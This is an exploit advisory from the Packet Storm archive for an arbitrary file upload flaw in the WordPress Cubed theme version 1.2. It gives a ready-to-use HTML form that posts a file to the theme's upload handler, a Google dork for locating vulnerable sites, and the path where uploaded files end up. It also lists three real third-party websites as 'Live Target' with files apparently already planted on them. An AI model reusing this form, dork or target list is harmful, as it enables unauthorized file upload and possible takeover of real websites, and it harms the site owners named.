WordPress Cubed Theme 1.2 CSRF / File Upload

2016-09-09T00:00:00
ID PACKETSTORM:138648
Type packetstorm
Reporter howucan
Modified 2016-09-09T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Theme cubed_v1.2 CSRF File Upload Vulnerability  
# Author: howucan  
# facebook: https://www.facebook.com/howucan.gr/  
# Date: 2016/09/07  
# Infected File: upload_handler.php  
# Category: webapps/php  
# Google dork: inurl:/wp-content/themes/cubed_v1.2/  
  
  
# Exploit & POC :  
  
<form enctype="multipart/form-data"  
action="  
http://127.0.0.1/wordpress/wp-content/themes/cubed_v1.2/functions/upload-handler.php"  
method="post">  
Your File: <input name="uploadfile" type="file" /><br />  
<input type="submit" value="upload" />  
</form>  
  
#File path:  
http://site.com/wordpress/wp-content/uploads/[FILE]  
or  
http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE]  
  
# Live Target  
  
http://avto-kluchar.info/wp-content/uploads/2016/09/1.jpg  
http://auto-locksmith-service.co.uk/wp-content/uploads/2016/09/1.jpg  
http://nicoparty.ro/wp-content/uploads/2016/09/1.jpg  
  
############################################################  
SALONIKA PUNK ROCK CITY  
############################################################  
`